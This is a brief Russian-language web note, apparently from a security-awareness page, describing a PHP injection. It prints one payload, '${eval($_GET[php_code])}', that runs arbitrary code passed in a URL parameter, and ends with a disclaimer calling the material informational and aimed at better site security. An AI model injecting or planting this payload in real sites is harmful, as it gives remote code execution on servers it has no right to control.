Обновлено: 23 декабря, 2021
Следующий код дает возможность атакующему исполнить на странице произвольный PHP-код.
${eval($_GET[php_code])}
ВНИМАНИЕ! Данный материал носит чисто ознакомительный характер, и призван к принятию дополнительных мер по обеспечению безопасности сайтов и информационных систем.